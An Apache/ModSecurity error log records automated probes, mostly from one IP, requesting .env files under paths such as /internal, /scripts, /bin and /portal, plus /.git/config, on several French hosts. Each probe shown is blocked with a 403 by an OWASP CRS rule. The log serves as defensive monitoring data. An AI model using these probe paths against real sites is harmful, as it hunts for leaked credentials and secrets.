[Mon May 11 16:26:18.943954 2026] [security2:error] [pid 1411201:tid 1411253] [client 18.180.54.2:58488] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /internal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/internal/.env"] [unique_id "agHnCvy_GXSWIKeli0vySgAAAIc"]
[Mon May 11 16:26:18.944201 2026] [security2:error] [pid 1411201:tid 1411253] [client 18.180.54.2:58488] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/internal/.env"] [unique_id "agHnCvy_GXSWIKeli0vySgAAAIc"]
[Mon May 11 16:26:18.944700 2026] [core:error] [pid 1411201:tid 1411253] [client 18.180.54.2:58488] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:18.944855 2026] [security2:error] [pid 1411201:tid 1411253] [client 18.180.54.2:58488] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/internal/.env"] [unique_id "agHnCvy_GXSWIKeli0vySgAAAIc"]
[Mon May 11 16:26:18.953615 2026] [security2:error] [pid 1416109:tid 1416153] [client 35.243.249.28:58238] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.git/config"] [unique_id "agHnClV4kyjgo4bQBUhUPgAAANc"]
[Mon May 11 16:26:18.953789 2026] [security2:error] [pid 1416109:tid 1416153] [client 35.243.249.28:58238] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.git/config"] [unique_id "agHnClV4kyjgo4bQBUhUPgAAANc"]
[Mon May 11 16:26:18.954006 2026] [security2:error] [pid 1416109:tid 1416153] [client 35.243.249.28:58238] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.git/config"] [unique_id "agHnClV4kyjgo4bQBUhUPgAAANc"]
[Mon May 11 16:26:19.257850 2026] [security2:error] [pid 1412074:tid 1412096] [client 18.180.54.2:58494] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /scripts/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/scripts/.env"] [unique_id "agHnCzJnyuKVXoStDha0pgAAAFQ"]
[Mon May 11 16:26:19.258110 2026] [security2:error] [pid 1412074:tid 1412096] [client 18.180.54.2:58494] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/scripts/.env"] [unique_id "agHnCzJnyuKVXoStDha0pgAAAFQ"]
[Mon May 11 16:26:19.258853 2026] [core:error] [pid 1412074:tid 1412096] [client 18.180.54.2:58494] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:19.260295 2026] [security2:error] [pid 1412074:tid 1412096] [client 18.180.54.2:58494] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/scripts/.env"] [unique_id "agHnCzJnyuKVXoStDha0pgAAAFQ"]
[Mon May 11 16:26:19.640960 2026] [security2:error] [pid 1416109:tid 1416152] [client 18.180.54.2:58498] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tools/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/tools/.env"] [unique_id "agHnC1V4kyjgo4bQBUhUQQAAANY"]
[Mon May 11 16:26:19.641222 2026] [security2:error] [pid 1416109:tid 1416152] [client 18.180.54.2:58498] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/tools/.env"] [unique_id "agHnC1V4kyjgo4bQBUhUQQAAANY"]
[Mon May 11 16:26:19.641724 2026] [core:error] [pid 1416109:tid 1416152] [client 18.180.54.2:58498] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:19.641881 2026] [security2:error] [pid 1416109:tid 1416152] [client 18.180.54.2:58498] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/tools/.env"] [unique_id "agHnC1V4kyjgo4bQBUhUQQAAANY"]
[Mon May 11 16:26:19.945078 2026] [security2:error] [pid 1411055:tid 1411059] [client 18.180.54.2:58510] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/bin/.env"] [unique_id "agHnC0WKUxpmnkK7zHx7-QAAAQI"]
[Mon May 11 16:26:19.945336 2026] [security2:error] [pid 1411055:tid 1411059] [client 18.180.54.2:58510] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/bin/.env"] [unique_id "agHnC0WKUxpmnkK7zHx7-QAAAQI"]
[Mon May 11 16:26:19.945857 2026] [core:error] [pid 1411055:tid 1411059] [client 18.180.54.2:58510] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:19.946012 2026] [security2:error] [pid 1411055:tid 1411059] [client 18.180.54.2:58510] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/bin/.env"] [unique_id "agHnC0WKUxpmnkK7zHx7-QAAAQI"]
[Mon May 11 16:26:20.362943 2026] [security2:error] [pid 1411201:tid 1411261] [client 18.180.54.2:58512] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /scripts/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/scripts/.env"] [unique_id "agHnDPy_GXSWIKeli0vyTQAAAI8"]
[Mon May 11 16:26:20.363194 2026] [security2:error] [pid 1411201:tid 1411261] [client 18.180.54.2:58512] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/scripts/.env"] [unique_id "agHnDPy_GXSWIKeli0vyTQAAAI8"]
[Mon May 11 16:26:20.363687 2026] [core:error] [pid 1411201:tid 1411261] [client 18.180.54.2:58512] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:20.363863 2026] [security2:error] [pid 1411201:tid 1411261] [client 18.180.54.2:58512] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/scripts/.env"] [unique_id "agHnDPy_GXSWIKeli0vyTQAAAI8"]
[Mon May 11 16:26:20.666247 2026] [security2:error] [pid 1416109:tid 1416151] [client 18.180.54.2:58528] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sbin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/sbin/.env"] [unique_id "agHnDFV4kyjgo4bQBUhUQgAAANU"]
[Mon May 11 16:26:20.666481 2026] [security2:error] [pid 1416109:tid 1416151] [client 18.180.54.2:58528] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/sbin/.env"] [unique_id "agHnDFV4kyjgo4bQBUhUQgAAANU"]
[Mon May 11 16:26:20.666958 2026] [core:error] [pid 1416109:tid 1416151] [client 18.180.54.2:58528] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:20.667105 2026] [security2:error] [pid 1416109:tid 1416151] [client 18.180.54.2:58528] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/sbin/.env"] [unique_id "agHnDFV4kyjgo4bQBUhUQgAAANU"]
[Mon May 11 16:26:21.061520 2026] [security2:error] [pid 1416109:tid 1416132] [client 18.180.54.2:58532] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/bin/.env"] [unique_id "agHnDVV4kyjgo4bQBUhUQwAAAMI"]
[Mon May 11 16:26:21.061745 2026] [security2:error] [pid 1416109:tid 1416132] [client 18.180.54.2:58532] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/bin/.env"] [unique_id "agHnDVV4kyjgo4bQBUhUQwAAAMI"]
[Mon May 11 16:26:21.062249 2026] [core:error] [pid 1416109:tid 1416132] [client 18.180.54.2:58532] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:21.062411 2026] [security2:error] [pid 1416109:tid 1416132] [client 18.180.54.2:58532] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/bin/.env"] [unique_id "agHnDVV4kyjgo4bQBUhUQwAAAMI"]
[Mon May 11 16:26:21.417624 2026] [security2:error] [pid 1411055:tid 1411070] [client 18.180.54.2:58544] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/local/.env"] [unique_id "agHnDUWKUxpmnkK7zHx7-wAAAQ0"]
[Mon May 11 16:26:21.417864 2026] [security2:error] [pid 1411055:tid 1411070] [client 18.180.54.2:58544] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/local/.env"] [unique_id "agHnDUWKUxpmnkK7zHx7-wAAAQ0"]
[Mon May 11 16:26:21.418438 2026] [core:error] [pid 1411055:tid 1411070] [client 18.180.54.2:58544] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:21.418610 2026] [security2:error] [pid 1411055:tid 1411070] [client 18.180.54.2:58544] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/local/.env"] [unique_id "agHnDUWKUxpmnkK7zHx7-wAAAQ0"]
[Mon May 11 16:26:21.781803 2026] [security2:error] [pid 1411099:tid 1411103] [client 18.180.54.2:58558] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sbin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/sbin/.env"] [unique_id "agHnDQ-Qm4vhlWBPlMi6DwAAAAI"]
[Mon May 11 16:26:21.782033 2026] [security2:error] [pid 1411099:tid 1411103] [client 18.180.54.2:58558] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/sbin/.env"] [unique_id "agHnDQ-Qm4vhlWBPlMi6DwAAAAI"]
[Mon May 11 16:26:21.782559 2026] [core:error] [pid 1411099:tid 1411103] [client 18.180.54.2:58558] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:21.785956 2026] [security2:error] [pid 1411099:tid 1411103] [client 18.180.54.2:58558] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/sbin/.env"] [unique_id "agHnDQ-Qm4vhlWBPlMi6DwAAAAI"]
[Mon May 11 16:26:22.159393 2026] [security2:error] [pid 1411201:tid 1411266] [client 18.180.54.2:58560] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/portal/.env"] [unique_id "agHnDvy_GXSWIKeli0vyUQAAAJU"]
[Mon May 11 16:26:22.159683 2026] [security2:error] [pid 1411201:tid 1411266] [client 18.180.54.2:58560] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/portal/.env"] [unique_id "agHnDvy_GXSWIKeli0vyUQAAAJU"]
[Mon May 11 16:26:22.160226 2026] [core:error] [pid 1411201:tid 1411266] [client 18.180.54.2:58560] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:22.160391 2026] [security2:error] [pid 1411201:tid 1411266] [client 18.180.54.2:58560] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/portal/.env"] [unique_id "agHnDvy_GXSWIKeli0vyUQAAAJU"]
[Mon May 11 16:26:22.580341 2026] [security2:error] [pid 1412074:tid 1412098] [client 18.180.54.2:58562] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/local/.env"] [unique_id "agHnDjJnyuKVXoStDha0rgAAAFY"]
[Mon May 11 16:26:22.580591 2026] [security2:error] [pid 1412074:tid 1412098] [client 18.180.54.2:58562] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/local/.env"] [unique_id "agHnDjJnyuKVXoStDha0rgAAAFY"]
[Mon May 11 16:26:22.581613 2026] [core:error] [pid 1412074:tid 1412098] [client 18.180.54.2:58562] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
